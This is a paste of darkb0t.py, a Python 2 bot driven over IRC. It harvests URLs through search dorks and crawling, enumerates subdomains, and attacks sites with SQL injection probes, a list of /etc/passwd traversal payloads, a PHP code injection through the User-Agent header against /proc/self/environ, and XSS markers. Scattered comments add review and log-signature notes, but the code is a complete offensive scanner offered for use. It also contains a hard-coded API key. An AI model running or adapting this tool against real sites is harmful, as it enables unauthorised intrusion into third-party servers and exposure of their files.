mrgobel

dark.py

Jan 7th, 2017
  1. #!/usr/bin/python
  2. # This was written for educational purpose and pentest only. Use it at your own risk.
  3. # Author will be not responsible for any damage!
  4. # !!! Special greetz for my friend sinner_01 !!!
  5. # Toolname : darkb0t.py
  6. # Coder : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
  7. # Version : 0.4
  8. # Greetz for rsauron and low1z, great python coders
  9. # greetz for d3hydr8, r45c4l, qk, fx0, Soul, MikiSoft, c0ax, b0ne and all members of ex darkc0de.com, ljuska.org & darkartists.info
  10.  
  11. import sys, subprocess, socket, string, httplib, urlparse, urllib, re, urllib2, random, threading, cookielib
  12. from sgmllib import SGMLParser
  13. from xml.dom.minidom import parse, parseString
  14. from time import sleep
  15.  
  # Compatibility shim: if the bare name `set` is not defined, the lookup raises
  # NameError and the `sets` module's Set class is bound to that name instead.
  try:
      set
  except NameError:
      from sets import Set as set
  20.  
  21.  
  def logo():
      """Print the tool's banner to stdout, one row per line."""
      banner_rows = (
          "\n|---------------------------------------------------------------|",
          "| Up[@]hacker-newbie[dot]org |",
          "| 02/2012 darkb0t.py v.0.4 |",
          "| By UP |",
          "|---------------------------------------------------------------|\n",
      )
      for row in banner_rows:
          print row
  28.  
  def cmd():
      """Print the list of chat commands the bot reacts to (local console only)."""
      help_rows = (
          "[!] Commands the bot understands: ",
          "\n[+] !help : Help",
          "[+] !usage : Examples of usage",
          "[+] !over : Bot quits",
          "[+] !clear : Clearing the urls in array!",
          "[+] !status : Show status of finished threads",
          "[+] !reverse : List domains hosted on the same IP",
          "[+] !srvinfo : Some info about target server",
          "[+] !sub : Checking for subdomains",
          "[+] !check : Crawl links from target and check for SQLi, LFI, LFI to RCE, XSS",
          "[+] !dork : Using dork for collecting links and then check for SQLi",
      )
      for row in help_rows:
          print row
  41.  
  # Clear the terminal, then show the banner and the command list. shell=True is
  # used with fixed literals only, so no external input reaches the shell here.
  if sys.platform == 'linux' or sys.platform == 'linux2':
      subprocess.call('clear', shell=True)
      logo()
      cmd()
  else:
      subprocess.call('cls', shell=True)
      logo()
      cmd()
  # NOTE(review): the paste lost its indentation; this argument check is assumed
  # to be top-level (run on every platform) — confirm against the original file.
  # Exactly four arguments are required: IRC host, port, nick and channel.
  if len(sys.argv) != 5:
      print "[!] Usage: python darkb0t.py <host> <port> <nick> <channel>"
      print "[!] Exiting, thx for using script"
      sys.exit(1)
  54.  
  # Wordlist of host labels that sub() prepends to a domain and tries to resolve.
  # For defenders: a burst of lookups for these labels under one zone, mostly
  # failing, is what this enumeration looks like in resolver logs.
  subdomains = ['adm','admin','admins','agent','aix','alerts','av','antivirus','app','apps','appserver','archive','as400','auto','backup','banking','bbdd','bbs','bea','beta','blog','catalog','cgi','channel','channels','chat','cisco','client','clients','club','cluster','clusters','code','commerce','community','compaq','conole','consumer','contact','contracts','corporate','ceo','cso','cust','customer','cpanel','data','bd','db2','default','demo','design','desktop','dev','develop','developer','device','dial','digital','dir','directory','disc','discovery','disk','dns','dns1','dns2','dns3','docs','documents','domain','domains','dominoweb','download','downloads','ecommerce','e-commerce','edi','edu','education','email','enable','engine','engineer','enterprise','error','event','events','example','exchange','extern','external','extranet','fax','field','finance','firewall','forum','forums','fsp','ftp','ftp2','fw','fw1','gallery','galleries','games','gateway','gopher','guest','gw','hello','helloworld','help','helpdesk','helponline','hp','ibm','ibmdb','ids','ILMI','images','imap','imap4','img','imgs','info','intern','internal','intranet','invalid','iphone','ipsec','irc','ircserver','jobs','ldap','link','linux','lists','listserver','local','localhost','log','logs','login','lotus','mail','mailboxes','mailhost','management','manage','manager','map','maps','marketing','device','media','member','members','messenger','mngt','mobile','monitor','multimedia','music','my','names','net','netdata','netstats','network','news','nms','nntp','ns','ns1','ns2','ns3','ntp','online','openview','oracle','outlook','page','pages','partner','partners','pda','personal','ph','pictures','pix','pop','pop3','portal','press','print','printer','private','project','projects','proxy','public','ra','radio','raptor','ras','read','register','remote','report','reports','root','router','rwhois','sac','schedules','scotty','search','secret','secure','security','seri','serv','serv2','server','service','services','shop','shopping','site','sms','smtp','smtphost','snmp','snmpd','snort','solaris','solutions','support','source','sql','ssl','stats','store','stream','streaming','sun','support','switch','sysback','system','tech','terminal','test','testing','testing123','time','tivoli','training','transfers','uddi','update','upload','uploads','video','vpn','w1','w2','w3','wais','wap','web','webdocs','weblib','weblogic','webmail','webserver','webservices','websphere','whois','wireless','work','world','write','ws','ws1','ws2','ws3','www1','www2','www3']

  # Pool of User-Agent strings; search() picks one at random per request.
  # The other request paths in this file do not use this pool.
  header = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
            'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
            'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
            'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
            'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
            'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
            'Microsoft Internet Explorer/4.0b1 (Windows 95)',
            'Opera/8.00 (Windows NT 5.1; U; en)',
            'amaya/9.51 libwww/5.4.0',
            'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
            'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
            'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
            'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
            'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
            'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']
  72.  
  # label -> pattern. SQLi() runs re.search(pattern, body) for every entry and
  # echoes the label on a hit. The values are used as regular expressions, not
  # plain substrings, and several are generic ('Not found', 'Server Error',
  # 'Syntax error'), so a hit is a noisy hint rather than proof of injection.
  sqlerrors = {'MySQL': 'error in your SQL syntax',
               'MiscError': 'mysql_fetch',
               'MiscError2': 'num_rows',
               'Oracle': 'ORA-01756',
               'JDBC_CFM': 'Error Executing Database Query',
               'JDBC_CFM2': 'SQLServer JDBC Driver',
               'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',
               'MSSQL_Uqm': 'Unclosed quotation mark',
               'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
               'MS-Access_JETdb': 'Microsoft JET Database',
               'Error Occurred While Processing Request' : 'Error Occurred While Processing Request',
               'Server Error' : 'Server Error',
               'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error',
               'Invalid Querystring' : 'Invalid Querystring',
               'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC',
               'VBScript Runtime' : 'VBScript Runtime',
               'ADODB.Field' : 'ADODB.Field',
               'BOF or EOF' : 'BOF or EOF',
               'ADODB.Command' : 'ADODB.Command',
               'JET Database' : 'JET Database',
               'mysql_fetch_array()' : 'mysql_fetch_array()',
               'Syntax error' : 'Syntax error',
               'mysql_numrows()' : 'mysql_numrows()',
               'GetArray()' : 'GetArray()',
               'FetchRow()' : 'FetchRow()',
               'Input string was not in a correct format' : 'Input string was not in a correct format',
               'Not found' : 'Not found'}

  # Suffixes appended to each candidate URL by lfi_rce(): /etc/passwd at
  # increasing `../` depths, first with a trailing %00 and then without.
  # These literal sequences in a request URI are the log signature of the probe.
  lfis = ["/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../../etc/passwd%00","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"]

  # Marker strings appended by xss(), raw and URL-encoded; xss() then looks for
  # the text "XSS by baltazar" in the response.
  xsses = ["<h1>XSS by baltazar</h1>","%3Ch1%3EXSS%20by%20baltazar%3C/h1%3E"]

  # Process-wide default socket timeout, in seconds.
  timeout = 300
  socket.setdefaulttimeout(timeout)
  # threads: injThread workers started by !dork; urls: shared URL accumulator
  # that search() appends to and !clear / !check rebind.
  threads = []
  urls = []

  # IRC connection parameters from the command line; a non-numeric port makes
  # int() raise ValueError here.
  host = sys.argv[1]
  port = int(sys.argv[2])
  nick = sys.argv[3]
  chan = sys.argv[4]
  114.  
  def revip():
      """Report hostnames that a search API returns for the target's IP address.

      Reads the module-level `target` (set by the main loop from a chat
      message), resolves it, pages through an `ip:<addr>` query against
      api.bing.net and writes the collected hostnames to stdout and, through
      the module-level socket `s`, to the IRC channel `chan`.
      """
      sites = [target]
      # NOTE(review): hard-coded API key shipped in the source; anyone holding
      # this file holds the credential.
      appid = '01CDBCA91C590493EE4E91FAF83E5239FEF6ADFD'
      ip = socket.gethostbyname(target)
      offset = 50
      num = 1
      # Offsets 50, 100, ... 250 are requested; offset 0 never is.
      while offset < 300:
          url ="/xml.aspx?AppId=%s&Query=ip:%s&Sources=Web&Version=2.0&Market=en-us&Adult=Moderate&Options=EnableHighlighting&Web.Count=50&Web.Offset=%s&Web.Options=DisableQueryAlterations" % (appid, ip, offset)
          conn = httplib.HTTPConnection("api.bing.net")
          conn.request("GET", url)
          res = conn.getresponse()
          data = res.read()
          conn.close()
          xmldoc = parseString(data)
          name = xmldoc.getElementsByTagName('web:DisplayUrl')
          for n in name:
              temp = n.childNodes[0].nodeValue
              # keep only the host part of the display URL
              temp = temp.split("/")[0]
              # entries containing 'www.' are dropped; duplicates are not removed
              if temp.find('www.') == -1:
                  sites.append(temp)
          # NOTE(review): nesting reconstructed from an unindented paste; the
          # increment is assumed to belong to the while loop — confirm.
          offset += 50
      print "\n[+] Target: ",target
      print "[+] IP: ",ip
      print "[+] Reverse IP LookUP ..."
      print "[+] Please wait!"
      print "[!] Total: ", len(sites), " domain(s)\n"
      s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Target: ", target))
      s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] IP: ", ip))
      s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] Reverse IP LookUp ..."))
      s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] Please wait!"))
      s.send("PRIVMSG %s :%s%s%s\r\n" % (chan, "[!] Total: ",len(sites), " domain(s)"))
      for si in sites:
          print "[",num,"/",len(sites),"] http://"+si
          s.send("PRIVMSG %s :%s%s%s%s%s%s\r\n" % (chan,"[",num,"/",len(sites),"] http://", si))
          # two-second pause between channel messages
          sleep(2)
          num += 1
  151.  
  def srvinfo():
      """Send `HEAD /` to the target on port 80 and report its banner headers.

      Reads the module-level `target`; reports the resolved IP plus the
      Server, X-Powered-By (when present) and Date response headers to stdout
      and to the IRC channel. The request is plain HTTP on port 80 only.
      """
      conn = httplib.HTTPConnection(target, 80)
      try:
          conn.request("HEAD", "/")
      except socket.timeout:
          print "[-] Server Timeout"
          s.send("PRIVMSG %s :%s\r\n" % (chan, "[-] Server Timeout"))
      except(KeyboardInterrupt, SystemExit):
          pass
      # NOTE(review): neither handler above returns, so getresponse() is still
      # called after a failed request.
      r1 = conn.getresponse()
      conn.close()
      ip = socket.gethostbyname(target)
      server = r1.getheader('Server')
      xpoweredby = r1.getheader('x-powered-by')
      date = r1.getheader('date')
      # The two branches differ only in whether the X-Powered-By line is shown.
      if xpoweredby == None:
          print "\n[+] Ip of server: ", ip
          print "[+] Server info: ", server
          print "[+] Server date: ", date
          s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Ip of server: ", ip))
          s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Server info: ", server))
          s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Server date: ", date))
      else:
          print "\n[+] Ip of server: ", ip
          print "[+] Server info: ", server
          print "[+] Xpoweredby: ", xpoweredby
          print "[+] Server date: ", date
          s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Ip of server: ", ip))
          s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Server info: ", server))
          s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Xpoweredby: ", xpoweredby))
          s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Server date: ", date))
  183.  
  def sub():
      """Try to resolve `<label>.<domain>` for every label in `subdomains`.

      Reads the module-level `domain`; each name that resolves is printed and
      sent to the IRC channel, followed by a count. Names that fail to resolve
      are skipped silently.
      """
      w00t = 0
      print "\n[+] Target: ", domain
      s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Target: ", domain))
      print "[+] Checking for subdomains\n"
      s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] Checking for subdomains"))
      # the loop variable shadows this function's own name inside the body
      for sub in subdomains:
          subdomain = sub+'.'+domain
          try:
              # the resolved address is stored in a local and not used further
              target = socket.gethostbyname(subdomain)
              w00t = w00t+1
              print subdomain
              s.send("PRIVMSG %s :%s\r\n" % (chan, subdomain))
          except:
              # bare except: resolution failures and send errors alike are dropped
              pass
      print "[!] Found ",w00t," subdomain(s)\n"
      # NOTE(review): the text starts with "\n", which puts a line break inside
      # the outgoing IRC line.
      s.send("PRIVMSG %s :%s%s%s\r\n" % (chan, "\n[!] Found ",w00t, " subdomain(s)!"))
  201.  
  def SQLi(u):
      """Request `u` with a single quote appended and scan the body for DB errors.

      Every pattern in `sqlerrors` that matches the response is reported to
      stdout and to the IRC channel. In server logs the probe is a GET whose
      URL ends in `'`; the request uses urllib2's default User-Agent.
      """
      host = u + "'"
      try:
          source = urllib2.urlopen(host).read()
          # `type` shadows the builtin within this function
          for type, eMSG in sqlerrors.items():
              if re.search(eMSG, source):
                  print "[!] w00t,w00t!: ",host," Error: ", type, " ---> SQL Injection"
                  s.send("PRIVMSG %s :%s%s%s%s%s\r\n" % (chan, "[!] w00t,w00t!: ", host, " Error: ", type, " ---> SQL Injection"))
                  sleep(2)
              else:
                  pass
      except:
          # bare except: network errors, HTTP error statuses and send failures
          # are all swallowed
          pass
  215.  
  def lfi_rce(u):
      """Append each `lfis` suffix to `u` and report responses containing "root:x".

      For every hit a second request is made with `/etc/passwd` replaced by
      `/proc/self/environ` and the User-Agent set to a fixed PHP snippet; the
      response is searched for a fixed 32-hex-digit marker and a match is
      reported as "LFI to RCE".

      For defenders: the traversal sequences, a request path containing
      /proc/self/environ and the literal User-Agent below are high-signal
      strings for web server and WAF log rules.
      """
      for lfi in lfis:
          try:
              check = urllib2.urlopen(u+lfi.replace("\n", "")).read()
              if re.findall("root:x", check):
                  print "[!] w00t,w00t!: ",u+lfi, " ---> LFI Found"
                  s.send("PRIVMSG %s :%s%s%s\r\n" % (chan, "[!] w00t,w00t!: ", u+lfi, " ---> LFI Found"))
                  sleep(2)
                  target = u+lfi
                  target = target.replace("/etc/passwd", "/proc/self/environ")
                  # local `header` (the User-Agent value), distinct from the
                  # module-level User-Agent pool of the same name
                  header = "<? echo md5(baltazar); ?>"
                  try:
                      request_web = urllib2.Request(target)
                      request_web.add_header('User-Agent', header)
                      text = urllib2.urlopen(request_web)
                      text = text.read()
                      if re.findall("f17f4b3e8e709cd3c89a6dbd949d7171", text):
                          print "[!] w00t,w00t!: ", target, " ---> LFI to RCE Found"
                          s.send("PRIVMSG %s :%s%s%s\r\n" % (chan, "[!] w00t!,w00t!: ", target, " ---> LFI to RCE Found"))
                          sleep(2)
                  except:
                      pass
          except:
              # errors are swallowed per suffix; the loop does not stop after a
              # hit, so later suffixes are still requested
              pass
  240.  
  def xss(u):
      """Append each `xsses` marker to `u` and report responses containing the marker text.

      The check is a plain search for "XSS by baltazar" in the body, which is
      also true when the text is reflected in escaped form; the report says so
      itself ("might be false").
      """
      # the loop variable shadows this function's own name inside the body
      for xss in xsses:
          try:
              source = urllib2.urlopen(u+xss.replace("\n", "")).read()
              if re.findall("XSS by baltazar", source):
                  print "[!] w00t,w00t!: ", u+xss, " ---> XSS found (might be false)"
                  s.send("PRIVMSG %s :%s%s%s\r\n" % (chan, "[!] w00t!,w00t!: ", u+xss, " ---> XSS found (might be false)"))
          except:
              pass
  250.  
  def search(inurl, maxc):
      """Collect result links for a search query and return one URL per domain.

      Queries www.search-results.com for `inurl` restricted to the module-level
      `site`, for `maxc` pages, appending unseen hrefs to the module-level
      `urls`. Returns the URLs in `urls` that contain "=", keeping only the
      first one seen for each host.
      """
      counter = 0
      while counter < int(maxc):
          jar = cookielib.FileCookieJar("cookies")
          query = inurl+'+site:'+site
          results_web = 'http://www.search-results.com/web?q='+query+'&hl=en&page='+repr(counter)+'&src=hmp'
          request_web = urllib2.Request(results_web)
          # random User-Agent from the module-level pool
          agent = random.choice(header)
          request_web.add_header('User-Agent', agent)
          opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
          text = opener_web.open(request_web).read()
          # every double-quoted href value on the result page
          stringreg = re.compile('(?<=href=")(.*?)(?=")')
          names = stringreg.findall(text)
          counter += 1
          for name in names:
              if name not in urls:
                  # skip links containing "(" or "<", site-relative links and
                  # http:// links whose host starts with a digit
                  if re.search(r'\(',name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):
                      pass
                  # skip links containing any of these names or a "%"
                  elif re.search("google",name) or re.search("youtube", name) or re.search("phpbuddy", name) or re.search("iranhack",name) or re.search("phpbuilder",name) or re.search("codingforums", name) or re.search("phpfreaks", name) or re.search("%", name) or re.search("facebook", name) or re.search("twitter", name):
                      pass
                  else:
                      urls.append(name)

      tmplist = []
      finallist = []
      print "[+] Urls collected: ", len(urls)
      s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Urls collected: ", len(urls)))
      for u in urls:
          try:
              # "scheme://host/rest" -> index 2 is the host
              host = u.split("/", 3)
              domain = host[2]
              if domain not in tmplist and "=" in u:
                  finallist.append(u)
                  tmplist.append(domain)
          except:
              # URLs with fewer than three "/"-separated parts are skipped
              pass
      print "[+] Urls for checking: ",len(finallist);print ""
      s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Urls for checking: ", len(finallist)))
      return finallist
  290.  
  class injThread(threading.Thread):
      """Worker thread that runs SQLi() over its own slice of URLs."""

      def __init__(self,hosts):
          # hosts: the URLs for this worker; fcount is summed by the !status
          # handler; check is the run flag that stop() clears
          self.hosts=hosts;self.fcount = 0
          self.check = True
          threading.Thread.__init__(self)

      def run (self):
          urls = list(self.hosts)
          for u in urls:
              try:
                  if self.check == True:
                      print u
                      SQLi(u)
                  else:
                      break
              except(KeyboardInterrupt,ValueError):
                  pass
          # NOTE(review): the paste lost its indentation; the increment is
          # assumed to run once after the loop (a "finished" counter) — confirm.
          self.fcount+=1

      def stop(self):
          # ask run() to leave its loop before the next URL
          self.check = False
  312.  
  class URLLister(SGMLParser):
      """SGML parser that gathers the href value of every <a> tag it is fed."""

      def reset(self):
          # Reset the base parser state, then start with an empty result list.
          SGMLParser.reset(self)
          self.urls = []

      def start_a(self, attrs):
          # attrs is a sequence of (name, value) pairs for one <a> tag.
          for key, value in attrs:
              if key == 'href':
                  self.urls.append(value)
  322.  
  def parse_urls(links):
      """Turn crawled hrefs into de-duplicated URLs that each end in "=".

      For a link with n "=" characters, n candidates are produced by cutting
      the link before each of them in turn and re-appending "=", so every
      parameter position becomes a URL ending in an empty value. Relies on the
      module-level `site`. Links without "=" are ignored. The order of the
      returned list is not defined (it passes through a set).
      """
      urls = []
      for link in links:
          num = link.count("=")
          if num > 0:
              for x in range(num):
                  # rsplit count runs 1..num
                  x = x + 1
                  # relative links are prefixed with the site root
                  if link[0] == "/" or link[0] == "?":
                      u = site+link.rsplit("=",x)[0]+"="
                  else:
                      u = link.rsplit("=",x)[0]+"="
                  # a candidate that lacks the site's domain (everything after
                  # the first "." of `site`) is prefixed with the site root
                  if u.find(site.split(".",1)[1]) == -1:
                      u = site+u
                  # collapse one doubled slash after the "http://" prefix
                  if u.count("//") > 1:
                      u = "http://"+u[7:].replace("//","/",1)
                  # NOTE(review): nesting reconstructed from an unindented
                  # paste; the append is assumed to run per candidate — confirm.
                  urls.append(u)
      urls = list(set(urls))
      return urls
  341.  
  # Connect to the IRC server given on the command line and join the channel.
  # The connection is plain TCP; only NICK, USER and JOIN are sent, with no
  # server password or services login. Registration replies are not awaited
  # before JOIN is sent.
  ircmsg = ""
  s = socket.socket( )
  s.connect((host, port))
  s.send("NICK %s\r\n" % nick)
  s.send("USER %s %s baltazar :%s\r\n" % (nick,nick,nick))
  s.send("JOIN :%s\r\n" % chan)
  348.  
  # Main IRC loop: read from the socket, split the buffer into lines and
  # dispatch on the fourth whitespace-separated token of each line.
  # Only that token is compared. The sender prefix (line[0]) is never checked
  # and the message type is checked only for JOIN, so the loop does not
  # distinguish who issued a command.
  # NOTE(review): arguments taken from the message (line[4] onwards) and text
  # scraped from remote pages are interpolated into outgoing PRIVMSG lines
  # as-is, without stripping CR/LF.
  # NOTE(review): block nesting below is reconstructed from a paste that lost
  # its indentation — confirm against the original file.
  while 1:
      ircmsg = ircmsg+s.recv(2048)
      temp = string.split(ircmsg, "\n")
      # the last element is an incomplete line; keep it for the next recv
      ircmsg = temp.pop()
      for line in temp:
          line = string.rstrip(line)
          line = string.split(line)
          try:
              # greet on every JOIN seen in the stream
              if line[1] == "JOIN":
                  name = str(line[0].split("!")[0])
                  s.send("PRIVMSG %s :%s%s\r\n" % (chan, "Welcome, ", name.replace(":","")))
                  s.send("PRIVMSG %s :%s\r\n" % (chan, "b4ltazar@gmail.com"))
                  s.send("PRIVMSG %s :%s\r\n" % (chan, "darkb0t.py v.0.4"))
                  s.send("PRIVMSG %s :%s\r\n" % (chan, "Visit ljuska.org & darkartists.info"))
                  s.send("PRIVMSG %s :%s\r\n" % (chan, "For help type: !help"))

              # lines with fewer than four tokens raise IndexError here, which
              # the handler at the end of this try block discards
              if line[3] == ":!help":
                  s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] Commands the b0t understands:"))
                  s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] !help : Help"))
                  s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] !usage : Examples of usage"))
                  s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] !over : Bot quits"))
                  s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] !clear : Clearing the urls in array!"))
                  s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] !status : Show status of finished threads"))
                  s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] !reverse : List domains hosted on the same IP"))
                  s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] !srvinfo : Some info about target server"))
                  s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] !sub : Checking for subdomains"))
                  s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] !check : Crawl links from target and check for SQLi, LFI, LFI to RCE, XSS"))
                  s.send("PRIVMSG %s :%s\r\n" % (chan, "[+] !dork : Using dork for collecting links and then check for SQLi"))

              if line[3] == ":!usage":
                  s.send("PRIVMSG %s :%s\r\n" % (chan, "[!] !reverse target.com"))
                  s.send("PRIVMSG %s :%s\r\n" % (chan, "[!] !srvinfo target.com"))
                  s.send("PRIVMSG %s :%s\r\n" % (chan, "[!] !sub target.com"))
                  s.send("PRIVMSG %s :%s\r\n" % (chan, "[!] !check http://www.target.com"))
                  s.send("PRIVMSG %s :%s\r\n" % (chan, "[!] !dork index.php?id= com 10 10"))

              if line[3] == ":!over":
                  s.send("PRIVMSG %s :%s\r\n" % (chan, "[!] darkb0t leaves, visit ljuska.org & darkartists.info"))
                  print "\n[!] Thx for using darkb0t, visit ljuska.org & darkartists.info"
                  # exits with status 1; no QUIT is sent and the socket is not closed
                  sys.exit(1)

              if line[3] == ":!clear":
                  urls = []
                  print "\n[!] Array cleared!"
                  s.send("PRIVMSG %s :%s\r\n" % (chan, "[!] Array cleared!"))

              if line[3] == ":!status":
                  mainthread = 0
                  if threads != []:
                      for thread in threads:
                          mainthread += thread.fcount
                  print "\n[+] Number of threads finished scanning: ", mainthread
                  s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Number of threads finished scanning: ", mainthread))

              # the next three commands store their argument in a module-level
              # name that the called function reads
              if line[3] == ":!reverse":
                  target = line[4]
                  revip()
              if line[3] == ":!srvinfo":
                  target = line[4]
                  srvinfo()
              if line[3] == ":!sub":
                  domain = line[4]
                  sub()
              if line[3] == ":!check":
                  site = line[4]
                  # normalise to "http://<lowercased host/path up to the last slash>/"
                  site = site.replace("http://","").rsplit("/",1)[0]+"/"
                  site = "http://"+site.lower()
                  try:
                      usock = urllib.urlopen(site)
                      parser = URLLister()
                      parser.feed(usock.read().lower())
                      parser.close()
                      usock.close()
                  except:
                      pass
                  # NOTE(review): if urlopen() failed above, `parser` is unbound
                  # (or left over from an earlier !check) when it is read here
                  urls = parse_urls(parser.urls)
                  print "\n[!] Links Found: ", len(urls); print ""
                  s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[!] Links Found: ", len(urls)))
                  # all three checks run sequentially in this thread, so no IRC
                  # traffic (including PING) is handled until they finish
                  for u in urls:
                      try:
                          print u
                          SQLi(u)
                          lfi_rce(u)
                          xss(u)
                      except(KeyboardInterrupt, SystemExit):
                          print "[!] CTRL+C activated, now exiting! Thx for using darkb0t.py!"

              if line[3] == ":!dork":
                  inurl = line[4]
                  site = line[5]
                  maxc = line[6]
                  numthreads = line[7]
                  print "\n[+] Dork: ", inurl
                  print "[+] Domain: ", site
                  print "[+] Number of page to search: ", maxc
                  print "[+] Number of threads: ", numthreads;print""
                  s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Dork: ", inurl))
                  s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Domain: ", site))
                  s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Number of page to search: ", maxc))
                  s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Number of threads: ", numthreads))
                  usearch = search(inurl, maxc)
                  # i: URLs per worker; m: remainder handed out one each to the
                  # first m workers
                  i = len(usearch) / int(numthreads)
                  m = len(usearch) % int(numthreads)
                  z = 0
                  # NOTE(review): numthreads is still the string from the chat
                  # message here, so this compares an int with a str
                  if len(threads) <= numthreads:
                      for x in range(0, int(numthreads)):
                          sliced = usearch[x*i:(x+1)*i]
                          if (z<m):
                              sliced.append(usearch[int(numthreads)*i+z])
                              z += 1
                          thread = injThread(sliced)
                          thread.start()
                          threads.append(thread)
                  # blocks the IRC loop until every worker has finished
                  for thread in threads:
                      thread.join()


          except(IndexError):
              # short lines and commands with missing arguments end up here;
              # any other exception type propagates and ends the loop
              pass

          # keep-alive: answer the server's PING with a PONG carrying its token
          if(line[0] == "PING"):
              sleep(1)
              s.send("PONG %s\r\n" % line[1])